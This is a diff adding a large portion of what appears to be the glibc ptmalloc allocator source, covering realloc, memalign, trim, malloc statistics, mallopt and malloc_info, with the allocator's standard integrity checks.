+  INTERNAL_SIZE_T size;
+  INTERNAL_SIZE_T nextsize;
+  INTERNAL_SIZE_T prevsize;
+  int             nextinuse;
+  mchunkptr       bck;
+  mchunkptr       fwd;
+
+  /*
+    If max_fast is 0, we know that av hasn't
+    yet been initialized, in which case do so below
+  */
+
+  if (get_max_fast () != 0) {
+    clear_fastchunks(av);
+
+    unsorted_bin = unsorted_chunks(av);
+
+    /*
+      Remove each chunk from fast bin and consolidate it, placing it
+      then in unsorted bin. Among other reasons for doing this,
+      placing in unsorted bin avoids needing to calculate actual bins
+      until malloc is sure that chunks aren't immediately going to be
+      reused anyway.
+    */
+
+    maxfb = &fastbin (av, NFASTBINS - 1);
+    fb = &fastbin (av, 0);
+    do {
+      p = atomic_exchange_acq (fb, 0);
+      if (p != 0) {
+	do {
+	  check_inuse_chunk(av, p);
+	  nextp = p->fd;
+
+	  /* Slightly streamlined version of consolidation code in free() */
+	  size = p->size & ~(PREV_INUSE|NON_MAIN_ARENA);
+	  nextchunk = chunk_at_offset(p, size);
+	  nextsize = chunksize(nextchunk);
+
+	  if (!prev_inuse(p)) {
+	    prevsize = p->prev_size;
+	    size += prevsize;
+	    p = chunk_at_offset(p, -((long) prevsize));
+	    unlink(av, p, bck, fwd);
+	  }
+
+	  if (nextchunk != av->top) {
+	    nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+	    if (!nextinuse) {
+	      size += nextsize;
+	      unlink(av, nextchunk, bck, fwd);
+	    } else
+	      clear_inuse_bit_at_offset(nextchunk, 0);
+
+	    first_unsorted = unsorted_bin->fd;
+	    unsorted_bin->fd = p;
+	    first_unsorted->bk = p;
+
+	    if (!in_smallbin_range (size)) {
+	      p->fd_nextsize = NULL;
+	      p->bk_nextsize = NULL;
+	    }
+
+	    set_head(p, size | PREV_INUSE);
+	    p->bk = unsorted_bin;
+	    p->fd = first_unsorted;
+	    set_foot(p, size);
+	  }
+
+	  else {
+	    size += nextsize;
+	    set_head(p, size | PREV_INUSE);
+	    av->top = p;
+	  }
+
+	} while ( (p = nextp) != 0);
+
+      }
+    } while (fb++ != maxfb);
+  }
+  else {
+    malloc_init_state(av);
+    check_malloc_state(av);
+  }
+}
+
+/*
+  ------------------------------ realloc ------------------------------
+*/
+
+void*
+_int_realloc(mstate av, mchunkptr oldp, INTERNAL_SIZE_T oldsize,
+	     INTERNAL_SIZE_T nb)
+{
+  mchunkptr        newp;            /* chunk to return */
+  INTERNAL_SIZE_T  newsize;         /* its size */
+  void*          newmem;          /* corresponding user mem */
+
+  mchunkptr        next;            /* next contiguous chunk after oldp */
+
+  mchunkptr        remainder;       /* extra space at end of newp */
+  unsigned long    remainder_size;  /* its size */
+
+  mchunkptr        bck;             /* misc temp for linking */
+  mchunkptr        fwd;             /* misc temp for linking */
+
+  unsigned long    copysize;        /* bytes to copy */
+  unsigned int     ncopies;         /* INTERNAL_SIZE_T words to copy */
+  INTERNAL_SIZE_T* s;               /* copy source */
+  INTERNAL_SIZE_T* d;               /* copy destination */
+
+  const char *errstr = NULL;
+
+  /* oldmem size */
+  if (__builtin_expect (oldp->size <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (oldsize >= av->system_mem, 0))
+    {
+      errstr = "realloc(): invalid old size";
+    errout:
+      malloc_printerr (check_action, errstr, chunk2mem (oldp), av);
+      return NULL;
+    }
+
+  check_inuse_chunk (av, oldp);
+
+  /* All callers already filter out mmap'ed chunks.  */
+  assert (!chunk_is_mmapped (oldp));
+
+  next = chunk_at_offset (oldp, oldsize);
+  INTERNAL_SIZE_T nextsize = chunksize (next);
+  if (__builtin_expect (next->size <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (nextsize >= av->system_mem, 0))
+    {
+      errstr = "realloc(): invalid next size";
+      goto errout;
+    }
+
+  if ((unsigned long) (oldsize) >= (unsigned long) (nb))
+    {
+      /* already big enough; split below */
+      newp = oldp;
+      newsize = oldsize;
+    }
+
+  else
+    {
+      /* Try to expand forward into top */
+      if (next == av->top &&
+          (unsigned long) (newsize = oldsize + nextsize) >=
+          (unsigned long) (nb + MINSIZE))
+        {
+          set_head_size (oldp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+          av->top = chunk_at_offset (oldp, nb);
+          set_head (av->top, (newsize - nb) | PREV_INUSE);
+          check_inuse_chunk (av, oldp);
+          return chunk2mem (oldp);
+        }
+
+      /* Try to expand forward into next chunk;  split off remainder below */
+      else if (next != av->top &&
+               !inuse (next) &&
+               (unsigned long) (newsize = oldsize + nextsize) >=
+               (unsigned long) (nb))
+        {
+          newp = oldp;
+          unlink (av, next, bck, fwd);
+        }
+
+      /* allocate, copy, free */
+      else
+        {
+          newmem = _int_malloc (av, nb - MALLOC_ALIGN_MASK);
+          if (newmem == 0)
+            return 0; /* propagate failure */
+
+          newp = mem2chunk (newmem);
+          newsize = chunksize (newp);
+
+          /*
+             Avoid copy if newp is next chunk after oldp.
+           */
+          if (newp == next)
+            {
+              newsize += oldsize;
+              newp = oldp;
+            }
+          else
+            {
+              /*
+                 Unroll copy of <= 36 bytes (72 if 8byte sizes)
+                 We know that contents have an odd number of
+                 INTERNAL_SIZE_T-sized words; minimally 3.
+               */
+
+              copysize = oldsize - SIZE_SZ;
+              s = (INTERNAL_SIZE_T *) (chunk2mem (oldp));
+              d = (INTERNAL_SIZE_T *) (newmem);
+              ncopies = copysize / sizeof (INTERNAL_SIZE_T);
+              assert (ncopies >= 3);
+
+              if (ncopies > 9)
+                memcpy (d, s, copysize);
+
+              else
+                {
+                  *(d + 0) = *(s + 0);
+                  *(d + 1) = *(s + 1);
+                  *(d + 2) = *(s + 2);
+                  if (ncopies > 4)
+                    {
+                      *(d + 3) = *(s + 3);
+                      *(d + 4) = *(s + 4);
+                      if (ncopies > 6)
+                        {
+                          *(d + 5) = *(s + 5);
+                          *(d + 6) = *(s + 6);
+                          if (ncopies > 8)
+                            {
+                              *(d + 7) = *(s + 7);
+                              *(d + 8) = *(s + 8);
+                            }
+                        }
+                    }
+                }
+
+              _int_free (av, oldp, 1);
+              check_inuse_chunk (av, newp);
+              return chunk2mem (newp);
+            }
+        }
+    }
+
+  /* If possible, free extra space in old or extended chunk */
+
+  assert ((unsigned long) (newsize) >= (unsigned long) (nb));
+
+  remainder_size = newsize - nb;
+
+  if (remainder_size < MINSIZE)   /* not enough extra to split off */
+    {
+      set_head_size (newp, newsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+    }
+  else   /* split remainder */
+    {
+      remainder = chunk_at_offset (newp, nb);
+      set_head_size (newp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      /* Mark remainder as inuse so free() won't complain */
+      set_inuse_bit_at_offset (remainder, remainder_size);
+      _int_free (av, remainder, 1);
+    }
+
+  check_inuse_chunk (av, newp);
+  return chunk2mem (newp);
+}
+
+/*
+   ------------------------------ memalign ------------------------------
+ */
+
+static void *
+_int_memalign (mstate av, size_t alignment, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;             /* padded  request size */
+  char *m;                        /* memory returned by malloc call */
+  mchunkptr p;                    /* corresponding chunk */
+  char *brk;                      /* alignment point within p */
+  mchunkptr newp;                 /* chunk to return */
+  INTERNAL_SIZE_T newsize;        /* its size */
+  INTERNAL_SIZE_T leadsize;       /* leading space before alignment point */
+  mchunkptr remainder;            /* spare room at end to split off */
+  unsigned long remainder_size;   /* its size */
+  INTERNAL_SIZE_T size;
+
+
+
+  checked_request2size (bytes, nb);
+
+  /*
+     Strategy: find a spot within that chunk that meets the alignment
+     request, and then possibly free the leading and trailing space.
+   */
+
+
+  /* Call malloc with worst case padding to hit alignment. */
+
+  m = (char *) (_int_malloc (av, nb + alignment + MINSIZE));
+
+  if (m == 0)
+    return 0;           /* propagate failure */
+
+  p = mem2chunk (m);
+
+  if ((((unsigned long) (m)) % alignment) != 0)   /* misaligned */
+
+    { /*
+                Find an aligned spot inside chunk.  Since we need to give back
+                leading space in a chunk of at least MINSIZE, if the first
+                calculation places us at a spot with less than MINSIZE leader,
+                we can move to the next aligned spot -- we've allocated enough
+                total room so that this is always possible.
+                 */
+      brk = (char *) mem2chunk (((unsigned long) (m + alignment - 1)) &
+                                - ((signed long) alignment));
+      if ((unsigned long) (brk - (char *) (p)) < MINSIZE)
+        brk += alignment;
+
+      newp = (mchunkptr) brk;
+      leadsize = brk - (char *) (p);
+      newsize = chunksize (p) - leadsize;
+
+      /* For mmapped chunks, just adjust offset */
+      if (chunk_is_mmapped (p))
+        {
+          newp->prev_size = p->prev_size + leadsize;
+          set_head (newp, newsize | IS_MMAPPED);
+          return chunk2mem (newp);
+        }
+
+      /* Otherwise, give back leader, use the rest */
+      set_head (newp, newsize | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+      set_head_size (p, leadsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      _int_free (av, p, 1);
+      p = newp;
+
+      assert (newsize >= nb &&
+              (((unsigned long) (chunk2mem (p))) % alignment) == 0);
+    }
+
+  /* Also give back spare room at the end */
+  if (!chunk_is_mmapped (p))
+    {
+      size = chunksize (p);
+      if ((unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (p, nb);
+          set_head (remainder, remainder_size | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head_size (p, nb);
+          _int_free (av, remainder, 1);
+        }
+    }
+
+  check_inuse_chunk (av, p);
+  return chunk2mem (p);
+}
+
+
+/*
+   ------------------------------ malloc_trim ------------------------------
+ */
+
+static int
+mtrim (mstate av, size_t pad)
+{
+  /* Don't touch corrupt arenas.  */
+  if (arena_is_corrupt (av))
+    return 0;
+
+  /* Ensure initialization/consolidation */
+  malloc_consolidate (av);
+
+  const size_t ps = GLRO (dl_pagesize);
+  int psindex = bin_index (ps);
+  const size_t psm1 = ps - 1;
+
+  int result = 0;
+  for (int i = 1; i < NBINS; ++i)
+    if (i == 1 || i >= psindex)
+      {
+        mbinptr bin = bin_at (av, i);
+
+        for (mchunkptr p = last (bin); p != bin; p = p->bk)
+          {
+            INTERNAL_SIZE_T size = chunksize (p);
+
+            if (size > psm1 + sizeof (struct malloc_chunk))
+              {
+                /* See whether the chunk contains at least one unused page.  */
+                char *paligned_mem = (char *) (((uintptr_t) p
+                                                + sizeof (struct malloc_chunk)
+                                                + psm1) & ~psm1);
+
+                assert ((char *) chunk2mem (p) + 4 * SIZE_SZ <= paligned_mem);
+                assert ((char *) p + size > paligned_mem);
+
+                /* This is the size we could potentially free.  */
+                size -= paligned_mem - (char *) p;
+
+                if (size > psm1)
+                  {
+#if MALLOC_DEBUG
+                    /* When debugging we simulate destroying the memory
+                       content.  */
+                    memset (paligned_mem, 0x89, size & ~psm1);
+#endif
+                    __madvise (paligned_mem, size & ~psm1, MADV_DONTNEED);
+
+                    result = 1;
+                  }
+              }
+          }
+      }
+
+#ifndef MORECORE_CANNOT_TRIM
+  return result | (av == &main_arena ? systrim (pad, av) : 0);
+
+#else
+  return result;
+#endif
+}
+
+
+int
+__malloc_trim (size_t s)
+{
+  int result = 0;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      (void) mutex_lock (&ar_ptr->mutex);
+      result |= mtrim (ar_ptr, s);
+      (void) mutex_unlock (&ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return result;
+}
+
+
+/*
+   ------------------------- malloc_usable_size -------------------------
+ */
+
+static size_t
+musable (void *mem)
+{
+  mchunkptr p;
+  if (mem != 0)
+    {
+      p = mem2chunk (mem);
+
+      if (__builtin_expect (using_malloc_checking == 1, 0))
+        return malloc_check_get_size (p);
+
+      if (chunk_is_mmapped (p))
+        return chunksize (p) - 2 * SIZE_SZ;
+      else if (inuse (p))
+        return chunksize (p) - SIZE_SZ;
+    }
+  return 0;
+}
+
+
+size_t
+__malloc_usable_size (void *m)
+{
+  size_t result;
+
+  result = musable (m);
+  return result;
+}
+
+/*
+   ------------------------------ mallinfo ------------------------------
+   Accumulate malloc statistics for arena AV into M.
+ */
+
+static void
+int_mallinfo (mstate av, struct mallinfo *m)
+{
+  size_t i;
+  mbinptr b;
+  mchunkptr p;
+  INTERNAL_SIZE_T avail;
+  INTERNAL_SIZE_T fastavail;
+  int nblocks;
+  int nfastblocks;
+
+  /* Ensure initialization */
+  if (av->top == 0)
+    malloc_consolidate (av);
+
+  check_malloc_state (av);
+
+  /* Account for top */
+  avail = chunksize (av->top);
+  nblocks = 1;  /* top always exists */
+
+  /* traverse fastbins */
+  nfastblocks = 0;
+  fastavail = 0;
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      for (p = fastbin (av, i); p != 0; p = p->fd)
+        {
+          ++nfastblocks;
+          fastavail += chunksize (p);
+        }
+    }
+
+  avail += fastavail;
+
+  /* traverse regular bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+      for (p = last (b); p != b; p = p->bk)
+        {
+          ++nblocks;
+          avail += chunksize (p);
+        }
+    }
+
+  m->smblks += nfastblocks;
+  m->ordblks += nblocks;
+  m->fordblks += avail;
+  m->uordblks += av->system_mem - avail;
+  m->arena += av->system_mem;
+  m->fsmblks += fastavail;
+  if (av == &main_arena)
+    {
+      m->hblks = mp_.n_mmaps;
+      m->hblkhd = mp_.mmapped_mem;
+      m->usmblks = mp_.max_total_mem;
+      m->keepcost = chunksize (av->top);
+    }
+}
+
+
+struct mallinfo
+__libc_mallinfo (void)
+{
+  struct mallinfo m;
+  mstate ar_ptr;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  memset (&m, 0, sizeof (m));
+  ar_ptr = &main_arena;
+  do
+    {
+      (void) mutex_lock (&ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &m);
+      (void) mutex_unlock (&ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return m;
+}
+
+/*
+   ------------------------------ malloc_stats ------------------------------
+ */
+
+void
+__malloc_stats (void)
+{
+  int i;
+  mstate ar_ptr;
+  unsigned int in_use_b = mp_.mmapped_mem, system_b = in_use_b;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  _IO_flockfile (stderr);
+  int old_flags2 = ((_IO_FILE *) stderr)->_flags2;
+  ((_IO_FILE *) stderr)->_flags2 |= _IO_FLAGS2_NOTCANCEL;
+  for (i = 0, ar_ptr = &main_arena;; i++)
+    {
+      struct mallinfo mi;
+
+      memset (&mi, 0, sizeof (mi));
+      (void) mutex_lock (&ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &mi);
+      fprintf (stderr, "Arena %d:\n", i);
+      fprintf (stderr, "system bytes     = %10u\n", (unsigned int) mi.arena);
+      fprintf (stderr, "in use bytes     = %10u\n", (unsigned int) mi.uordblks);
+#if MALLOC_DEBUG > 1
+      if (i > 0)
+        dump_heap (heap_for_ptr (top (ar_ptr)));
+#endif
+      system_b += mi.arena;
+      in_use_b += mi.uordblks;
+      (void) mutex_unlock (&ar_ptr->mutex);
+      ar_ptr = ar_ptr->next;
+      if (ar_ptr == &main_arena)
+        break;
+    }
+  fprintf (stderr, "Total (incl. mmap):\n");
+  fprintf (stderr, "system bytes     = %10u\n", system_b);
+  fprintf (stderr, "in use bytes     = %10u\n", in_use_b);
+  fprintf (stderr, "max mmap regions = %10u\n", (unsigned int) mp_.max_n_mmaps);
+  fprintf (stderr, "max mmap bytes   = %10lu\n",
+           (unsigned long) mp_.max_mmapped_mem);
+  ((_IO_FILE *) stderr)->_flags2 |= old_flags2;
+  _IO_funlockfile (stderr);
+}
+
+
+/*
+   ------------------------------ mallopt ------------------------------
+ */
+
+int
+__libc_mallopt (int param_number, int value)
+{
+  mstate av = &main_arena;
+  int res = 1;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  (void) mutex_lock (&av->mutex);
+  /* Ensure initialization/consolidation */
+  malloc_consolidate (av);
+
+  LIBC_PROBE (memory_mallopt, 2, param_number, value);
+
+  switch (param_number)
+    {
+    case M_MXFAST:
+      if (value >= 0 && value <= MAX_FAST_SIZE)
+        {
+          LIBC_PROBE (memory_mallopt_mxfast, 2, value, get_max_fast ());
+          set_max_fast (value);
+        }
+      else
+        res = 0;
+      break;
+
+    case M_TRIM_THRESHOLD:
+      LIBC_PROBE (memory_mallopt_trim_threshold, 3, value,
+                  mp_.trim_threshold, mp_.no_dyn_threshold);
+      mp_.trim_threshold = value;
+      mp_.no_dyn_threshold = 1;
+      break;
+
+    case M_TOP_PAD:
+      LIBC_PROBE (memory_mallopt_top_pad, 3, value,
+                  mp_.top_pad, mp_.no_dyn_threshold);
+      mp_.top_pad = value;
+      mp_.no_dyn_threshold = 1;
+      break;
+
+    case M_MMAP_THRESHOLD:
+      /* Forbid setting the threshold too high. */
+      if ((unsigned long) value > HEAP_MAX_SIZE / 2)
+        res = 0;
+      else
+        {
+          LIBC_PROBE (memory_mallopt_mmap_threshold, 3, value,
+                      mp_.mmap_threshold, mp_.no_dyn_threshold);
+          mp_.mmap_threshold = value;
+          mp_.no_dyn_threshold = 1;
+        }
+      break;
+
+    case M_MMAP_MAX:
+      LIBC_PROBE (memory_mallopt_mmap_max, 3, value,
+                  mp_.n_mmaps_max, mp_.no_dyn_threshold);
+      mp_.n_mmaps_max = value;
+      mp_.no_dyn_threshold = 1;
+      break;
+
+    case M_CHECK_ACTION:
+      LIBC_PROBE (memory_mallopt_check_action, 2, value, check_action);
+      check_action = value;
+      break;
+
+    case M_PERTURB:
+      LIBC_PROBE (memory_mallopt_perturb, 2, value, perturb_byte);
+      perturb_byte = value;
+      break;
+
+    case M_ARENA_TEST:
+      if (value > 0)
+        {
+          LIBC_PROBE (memory_mallopt_arena_test, 2, value, mp_.arena_test);
+          mp_.arena_test = value;
+        }
+      break;
+
+    case M_ARENA_MAX:
+      if (value > 0)
+        {
+          LIBC_PROBE (memory_mallopt_arena_max, 2, value, mp_.arena_max);
+          mp_.arena_max = value;
+        }
+      break;
+    }
+  (void) mutex_unlock (&av->mutex);
+  return res;
+}
+libc_hidden_def (__libc_mallopt)
+
+
+/*
+   -------------------- Alternative MORECORE functions --------------------
+ */
+
+
+/*
+   General Requirements for MORECORE.
+
+   The MORECORE function must have the following properties:
+
+   If MORECORE_CONTIGUOUS is false:
+
+ * MORECORE must allocate in multiples of pagesize. It will
+      only be called with arguments that are multiples of pagesize.
+
+ * MORECORE(0) must return an address that is at least
+      MALLOC_ALIGNMENT aligned. (Page-aligning always suffices.)
+
+   else (i.e. If MORECORE_CONTIGUOUS is true):
+
+ * Consecutive calls to MORECORE with positive arguments
+      return increasing addresses, indicating that space has been
+      contiguously extended.
+
+ * MORECORE need not allocate in multiples of pagesize.
+      Calls to MORECORE need not have args of multiples of pagesize.
+
+ * MORECORE need not page-align.
+
+   In either case:
+
+ * MORECORE may allocate more memory than requested. (Or even less,
+      but this will generally result in a malloc failure.)
+
+ * MORECORE must not allocate memory when given argument zero, but
+      instead return one past the end address of memory from previous
+      nonzero call. This malloc does NOT call MORECORE(0)
+      until at least one call with positive arguments is made, so
+      the initial value returned is not important.
+
+ * Even though consecutive calls to MORECORE need not return contiguous
+      addresses, it must be OK for malloc'ed chunks to span multiple
+      regions in those cases where they do happen to be contiguous.
+
+ * MORECORE need not handle negative arguments -- it may instead
+      just return MORECORE_FAILURE when given negative arguments.
+      Negative arguments are always multiples of pagesize. MORECORE
+      must not misinterpret negative args as large positive unsigned
+      args. You can suppress all such calls from even occurring by defining
+      MORECORE_CANNOT_TRIM,
+
+   There is some variation across systems about the type of the
+   argument to sbrk/MORECORE. If size_t is unsigned, then it cannot
+   actually be size_t, because sbrk supports negative args, so it is
+   normally the signed type of the same width as size_t (sometimes
+   declared as "intptr_t", and sometimes "ptrdiff_t").  It doesn't much
+   matter though. Internally, we use "long" as arguments, which should
+   work across all reasonable possibilities.
+
+   Additionally, if MORECORE ever returns failure for a positive
+   request, then mmap is used as a noncontiguous system allocator. This
+   is a useful backup strategy for systems with holes in address spaces
+   -- in this case sbrk cannot contiguously expand the heap, but mmap
+   may be able to map noncontiguous space.
+
+   If you'd like mmap to ALWAYS be used, you can define MORECORE to be
+   a function that always returns MORECORE_FAILURE.
+
+   If you are using this malloc with something other than sbrk (or its
+   emulation) to supply memory regions, you probably want to set
+   MORECORE_CONTIGUOUS as false.  As an example, here is a custom
+   allocator kindly contributed for pre-OSX macOS.  It uses virtually
+   but not necessarily physically contiguous non-paged memory (locked
+   in, present and won't get swapped out).  You can use it by
+   uncommenting this section, adding some #includes, and setting up the
+   appropriate defines above:
+
+ *#define MORECORE osMoreCore
+ *#define MORECORE_CONTIGUOUS 0
+
+   There is also a shutdown routine that should somehow be called for
+   cleanup upon program exit.
+
+ *#define MAX_POOL_ENTRIES 100
+ *#define MINIMUM_MORECORE_SIZE  (64 * 1024)
+   static int next_os_pool;
+   void *our_os_pools[MAX_POOL_ENTRIES];
+
+   void *osMoreCore(int size)
+   {
+    void *ptr = 0;
+    static void *sbrk_top = 0;
+
+    if (size > 0)
+    {
+      if (size < MINIMUM_MORECORE_SIZE)
+         size = MINIMUM_MORECORE_SIZE;
+      if (CurrentExecutionLevel() == kTaskLevel)
+         ptr = PoolAllocateResident(size + RM_PAGE_SIZE, 0);
+      if (ptr == 0)
+      {
+        return (void *) MORECORE_FAILURE;
+      }
+      // save ptrs so they can be freed during cleanup
+      our_os_pools[next_os_pool] = ptr;
+      next_os_pool++;
+      ptr = (void *) ((((unsigned long) ptr) + RM_PAGE_MASK) & ~RM_PAGE_MASK);
+      sbrk_top = (char *) ptr + size;
+      return ptr;
+    }
+    else if (size < 0)
+    {
+      // we don't currently support shrink behavior
+      return (void *) MORECORE_FAILURE;
+    }
+    else
+    {
+      return sbrk_top;
+    }
+   }
+
+   // cleanup any allocated memory pools
+   // called as last thing before shutting down driver
+
+   void osCleanupMem(void)
+   {
+    void **ptr;
+
+    for (ptr = our_os_pools; ptr < &our_os_pools[MAX_POOL_ENTRIES]; ptr++)
+      if (*ptr)
+      {
+         PoolDeallocate(*ptr);
+ * ptr = 0;
+      }
+   }
+
+ */
+
+
+/* Helper code.  */
+
+extern char **__libc_argv attribute_hidden;
+
+static void
+malloc_printerr (int action, const char *str, void *ptr, mstate ar_ptr)
+{
+  /* Avoid using this arena in future.  We do not attempt to synchronize this
+     with anything else because we minimally want to ensure that __libc_message
+     gets its resources safely without stumbling on the current corruption.  */
+  if (ar_ptr)
+    set_arena_corrupt (ar_ptr);
+
+  if ((action & 5) == 5)
+    __libc_message (action & 2, "%s\n", str);
+  else if (action & 1)
+    {
+      char buf[2 * sizeof (uintptr_t) + 1];
+
+      buf[sizeof (buf) - 1] = '\0';
+      char *cp = _itoa_word ((uintptr_t) ptr, &buf[sizeof (buf) - 1], 16, 0);
+      while (cp > buf)
+        *--cp = '0';
+
+      __libc_message (action & 2, "*** Error in `%s': %s: 0x%s ***\n",
+                      __libc_argv[0] ? : "<unknown>", str, cp);
+    }
+  else if (action & 2)
+    abort ();
+}
+
+/* We need a wrapper function for one of the additions of POSIX.  */
+int
+__posix_memalign (void **memptr, size_t alignment, size_t size)
+{
+  void *mem;
+
+  /* Test whether the SIZE argument is valid.  It must be a power of
+     two multiple of sizeof (void *).  */
+  if (alignment % sizeof (void *) != 0
+      || !powerof2 (alignment / sizeof (void *))
+      || alignment == 0)
+    return EINVAL;
+
+
+  void *address = RETURN_ADDRESS (0);
+  mem = _mid_memalign (alignment, size, address);
+
+  if (mem != NULL)
+    {
+      *memptr = mem;
+      return 0;
+    }
+
+  return ENOMEM;
+}
+weak_alias (__posix_memalign, posix_memalign)
+
+
+int
+__malloc_info (int options, FILE *fp)
+{
+  /* For now, at least.  */
+  if (options != 0)
+    return EINVAL;
+
+  int n = 0;
+  size_t total_nblocks = 0;
+  size_t total_nfastblocks = 0;
+  size_t total_avail = 0;
+  size_t total_fastavail = 0;
+  size_t total_system = 0;
+  size_t total_max_system = 0;
+  size_t total_aspace = 0;
+  size_t total_aspace_mprotect = 0;
+
+
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  fputs ("<malloc version=\"1\">\n", fp);
+
+  /* Iterate over all arenas currently in use.  */
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      fprintf (fp, "<heap nr=\"%d\">\n<sizes>\n", n++);
+
+      size_t nblocks = 0;
+      size_t nfastblocks = 0;
+      size_t avail = 0;
+      size_t fastavail = 0;
+      struct
+      {
+	size_t from;
+	size_t to;
+	size_t total;
+	size_t count;
+      } sizes[NFASTBINS + NBINS - 1];
+#define nsizes (sizeof (sizes) / sizeof (sizes[0]))
+
+      mutex_lock (&ar_ptr->mutex);
+
+      for (size_t i = 0; i < NFASTBINS; ++i)
+	{
+	  mchunkptr p = fastbin (ar_ptr, i);
+	  if (p != NULL)
+	    {
+	      size_t nthissize = 0;
+	      size_t thissize = chunksize (p);
+
+	      while (p != NULL)
+		{
+		  ++nthissize;
+		  p = p->fd;
+		}
+
+	      fastavail += nthissize * thissize;
+	      nfastblocks += nthissize;
+	      sizes[i].from = thissize - (MALLOC_ALIGNMENT - 1);
+	      sizes[i].to = thissize;
+	      sizes[i].count = nthissize;
+	    }
+	  else
+	    sizes[i].from = sizes[i].to = sizes[i].count = 0;
+
+	  sizes[i].total = sizes[i].count * sizes[i].to;
+	}
+
+
+      mbinptr bin;
+      struct malloc_chunk *r;
+
+      for (size_t i = 1; i < NBINS; ++i)
+	{
+	  bin = bin_at (ar_ptr, i);
+	  r = bin->fd;
+	  sizes[NFASTBINS - 1 + i].from = ~((size_t) 0);
+	  sizes[NFASTBINS - 1 + i].to = sizes[NFASTBINS - 1 + i].total
+					  = sizes[NFASTBINS - 1 + i].count = 0;
+
+	  if (r != NULL)
+	    while (r != bin)
+	      {
+		++sizes[NFASTBINS - 1 + i].count;
+		sizes[NFASTBINS - 1 + i].total += r->size;
+		sizes[NFASTBINS - 1 + i].from
+		  = MIN (sizes[NFASTBINS - 1 + i].from, r->size);
+		sizes[NFASTBINS - 1 + i].to = MAX (sizes[NFASTBINS - 1 + i].to,
+						   r->size);
+
+		r = r->fd;
+	      }
+
+	  if (sizes[NFASTBINS - 1 + i].count == 0)
+	    sizes[NFASTBINS - 1 + i].from = 0;
+	  nblocks += sizes[NFASTBINS - 1 + i].count;
+	  avail += sizes[NFASTBINS - 1 + i].total;
+	}
+
+      mutex_unlock (&ar_ptr->mutex);
+
+      total_nfastblocks += nfastblocks;
+      total_fastavail += fastavail;
+
+      total_nblocks += nblocks;
+      total_avail += avail;
+
+      for (size_t i = 0; i < nsizes; ++i)
+	if (sizes[i].count != 0 && i != NFASTBINS)
+	  fprintf (fp, "							      \
+  <size from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		   sizes[i].from, sizes[i].to, sizes[i].total, sizes[i].count);
+
+      if (sizes[NFASTBINS].count != 0)
+	fprintf (fp, "\
+  <unsorted from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		 sizes[NFASTBINS].from, sizes[NFASTBINS].to,
+		 sizes[NFASTBINS].total, sizes[NFASTBINS].count);
+
+      total_system += ar_ptr->system_mem;
+      total_max_system += ar_ptr->max_system_mem;
+
+      fprintf (fp,
+	       "</sizes>\n<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<system type=\"current\" size=\"%zu\"/>\n"
+	       "<system type=\"max\" size=\"%zu\"/>\n",
+	       nfastblocks, fastavail, nblocks, avail,
+	       ar_ptr->system_mem, ar_ptr->max_system_mem);
+
+      if (ar_ptr != &main_arena)
+	{
+	  heap_info *heap = heap_for_ptr (top (ar_ptr));
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n",
+		   heap->size, heap->mprotect_size);
+	  total_aspace += heap->size;
+	  total_aspace_mprotect += heap->mprotect_size;
+	}
+      else
+	{
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n",
+		   ar_ptr->system_mem, ar_ptr->system_mem);
+	  total_aspace += ar_ptr->system_mem;
+	  total_aspace_mprotect += ar_ptr->system_mem;
+	}
+
+      fputs ("</heap>\n", fp);
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  fprintf (fp,
+	   "<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"mmap\" count=\"%d\" size=\"%zu\"/>\n"
+	   "<system type=\"current\" size=\"%zu\"/>\n"
+	   "<system type=\"max\" size=\"%zu\"/>\n"
+	   "<aspace type=\"total\" size=\"%zu\"/>\n"
+	   "<aspace type=\"mprotect\" size=\"%zu\"/>\n"
+	   "</malloc>\n",
+	   total_nfastblocks, total_fastavail, total_nblocks, total_avail,
+	   mp_.n_mmaps, mp_.mmapped_mem,
+	   total_system, total_max_system,
+	   total_aspace, total_aspace_mprotect);
+
+  return 0;
+}
+weak_alias (__malloc_info, malloc_info)
+
+
+strong_alias (__libc_calloc, __calloc) weak_alias (__libc_calloc, calloc)
